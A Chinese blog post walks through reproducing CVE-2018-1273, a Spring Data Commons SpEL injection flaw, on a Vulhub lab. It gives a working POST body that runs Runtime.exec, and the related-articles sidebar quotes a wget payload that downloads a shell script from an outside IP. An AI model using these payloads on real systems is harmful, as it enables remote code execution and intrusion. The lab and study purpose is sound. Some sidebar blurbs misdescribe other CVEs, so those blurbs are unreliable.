CVE-2018-1273漏洞复现

最新推荐文章于 2024-05-18 21:26:17 发布
最新推荐文章于 2024-05-18 21:26:17 发布
阅读量1.3k 收藏
点赞数 4
分类专栏: 渗透测试 文章标签: CVE-2018-1273 spirng 漏洞发现 Web安全 RCE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40228200/article/details/128438620
版权

今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2018-1273漏洞复现。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、CVE-2018-1273漏洞简介

CVE2018-1273是Spring框架中爆出的RCE漏洞。攻击者可以再未授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。
今天,我们使用Vulhub靶场,来搭建CVE-2018-1273的漏洞靶场环境。进入安装Vulhub的虚拟机后,我们找到相应的目录下,然后执行命令:

docker-compose up -d

即可下载并开启开启该漏洞环境,上述命令执行结果如下所示:
在这里插入图片描述
之后,我们执行命令:

docker-compose config

即可查看该漏洞配置,上述命令执行结果如下所示:
在这里插入图片描述
漏洞打开后效果如下所示:
在这里插入图片描述

二、CVE-2018-1273漏洞复现

接下来,我们就可以复现CVE-2018-1273漏洞了。我们使用BurpSuite抓取访问目标系统的数据包,之后将该数据包的包头修改为如下所示:

POST /users?page=&size=5 HTTP/1.1

Content-Type值修改为如下所示:

Content-Type: application/x-www-form-urlencoded

Post提交的数据内容如下所示:

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("【要执行的命令】")]=&password=&repeatedPassword=

修改完成后的数据包如下所示:
在这里插入图片描述
之后,我们将该数据包放出,我们可以执行命令:

docker-compose exec spring bash

进入到Docker虚拟环境内部,结果如下所示:
在这里插入图片描述
从上图中可以看出,CVE-2018-1273漏洞复现成功!
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

永远是少年啊
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
linux漏洞分析,Spring-data-commons(CVE-2018-1273)漏洞分析
weixin_39830303的博客
05-13 835
前言CVE-2018-1273 是 Spring-data-commons近期爆出的一个可远程执行代码的漏洞,为了了解更多细节,本文将从漏洞的成因,漏洞的判定以及漏洞的利用三个方面来进行详细说明。漏洞的成因当用户在项目中利用了Spring-data的相关web特性对用户的输入参数进行自动匹配的时候,会将用户提交的form表单的key值作为Spel的执行内容,而这一步就是本次漏洞的爆发点。漏洞的判定...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
漏洞复现 | CVE-2018-1273 Spring Data Commons 远程命令执行
weixin_42282189的博客
09-15 1801
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 受影响版本: Spring Data Commons 1.13 – 1.13.10 (Inga.
spring:CVE-2018:1273
最新发布
weixin_69670995的博客
05-18 419
使用浏览器访问users,并输入随便东西。在kali上使用vim新建测试txt文件。使用dirsearch工具进行目录扫描。使用python3开启临时http。修改payload,让靶机执行木马。修改payload,提升木马权限。发到重发器,并修改post传参。返回200,上传txt文件成功。修改paylaod,上传木马。执行成功,返回靶机shell。使用burp抓包,点击注册。返回200,上传成功。
spring(CVE-2018-1273)远程代码执行漏洞复现
勤劳的码农的博客
03-12 1万+
Spring Data 是Spring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
vulhub中Spring之Spring Data Commons 远程命令执行漏洞CVE-2018-1273
weixin_41438728的博客
12-02 1430
vulhub中Spring之Spring Data Commons 远程命令执行漏洞CVE-2018-1273漏洞复现漏洞说明漏洞利用条件和方式漏洞影响范围漏洞检测环境搭建漏洞复现漏洞修复 漏洞复现 漏洞说明 漏洞利用条件和方式 漏洞影响范围 漏洞检测 环境搭建 漏洞复现 漏洞修复 ...
cve-2018-1273 Spring Expression Language 漏洞分析
whatday的专栏
07-31 1027
目录 0x00 背景 x01 漏洞影响 受影响的范围 0x02 SpEL 类类型表达式 类实例化 变量和函数的使用 0x03 SpEL调试 0x04 实战分析 CVE-2018-1273 攻击Exploit的诞生 0x00 背景 最近Spring框架不大太平,接连爆出来多个RCE远程代码执行的CVE漏洞,其中有CVE-2018-1270,CVE-2018-1273,通过对造成漏洞部分代码进行分析,发现都是因为滥用SpEL的StandardEvaluationContext。 x0
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
Spring Data Commons远程命令执行漏洞复现CVE-2018-1273
wutiangui的博客
09-10 805
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
CVE-2018-1273漏洞复现日志+IDS规则编写
weixin_41174502的博客
07-25 1614
CVE-2018-1273(Spring Data Commons) 远程命令执行漏洞 漏洞描述: Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较旧的不受支持的版本)包含由于特殊元素的不正确中和而导致的属性绑定器漏洞。未经身份验证的远程恶意用户(或攻击者)可以针对Spring Data REST支持的HTTP资源提供特制的请求参数,或者使用Spring Data的基于投影的请求有效负载绑定可能导致远程执行代码攻击。总结来说这是一个spel表
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
weixin_42786460的博客
09-16 374
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
Spring Data Commons 远程命令执行漏洞CVE-2018-1273复现
klcyl_0106的博客
05-25 419
1.通过"docker-compose build"和"docker-compose up -d"拉取环境 刚开始直接敲命令docker-compose build出错,最后发现是未启动docker,所以通过systemctl start docker命令启动docker 2.访问服务器ip:8080/users看环境是否成功 3.注册时抓包,并修改成如下数据包: POST /users?page=&size=5 HTTP/1.1 Host: localhost:8080 Connection:
[春秋云镜]CVE-2018-1273
niubi707的博客
12-02 5333
[春秋云镜]CVE-2018-1273Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。
001--什么是SpringData
weixin_42288943的博客
04-17 167
1.参考网址:https://blog.csdn.net/zgf19930504/article/details/50537198 2.核心内容: ** Spring Data **是Spring 的一个子项目, 旨在统一和简化对各类型持久化存储, 而不拘泥于是关系型数据库还是NoSQL 数据存储。无论是哪种持久化存储, 数据访问对象(或称作为DAO,...
vulhub中spring的CVE-2018-1273漏洞复现
yougexiaojiuguan的博客
11-30 989
学习过程中的记录,也是问了方便以后查看
端口号大全
热门推荐
一个小运维
03-14 5万+
计算机系统“端口”是英文 port 的义译,可以认为是计算机与外界通讯交流的出口。其中 硬件领域的端口又称接口,如:USB 端口、串行端口、打印机端口等。软件领域的端口一般 指网络中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数 据结构和 I/O(基本输入输出)缓冲区。说白了,我们在计算机的任何操作都在有意无意的 使用着计算机的各个端口,下面列出了计算机的常用端口: 0 ...
cve-2018-1297环境复现
08-03
CVE-2018-1297是一个Apache Struts框架中的严重漏洞。此漏洞允许攻击者通过精心构造的恶意请求来执行任意命令,从而完全控制服务器。 要复现CVE-2018-1297漏洞,需要以下步骤: 1. 设置实验环境:首先,需要准备一个安装了Apache Struts 2.3.x版本的服务器。可以使用轻量级的虚拟机或Docker容器等方式来创建这个环境。 2. 构造恶意请求:接下来,需要使用恶意的HTTP请求来触发漏洞。可以使用各种工具(如Curl、Postman等)来构造并发送这个请求。 3. 利用漏洞:恶意请求的主要目的是通过使用特定的参数和数据,来构造一个命令执行的payload。这个payload会被传递给Struts 2框架,从而触发漏洞并执行攻击者所期望的命令。 4. 验证漏洞:在恶意请求被发送之后,可以通过查看服务器日志或其他输出来验证是否成功触发了CVE-2018-1297漏洞。如果成功,攻击者将获得完全的远程访问权限。 5. 漏洞修复:一旦漏洞被成功复现和验证,需要立即采取措施来修复漏洞。这可能包括更新Apache Struts框架到最新版本,或者应用官方提供的安全补丁程序。 总结而言,要复现CVE-2018-1297漏洞需要设置实验环境、构造恶意请求、利用漏洞以及验证漏洞。这个漏洞的严重性需要及时修复和部署补丁以确保服务器的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值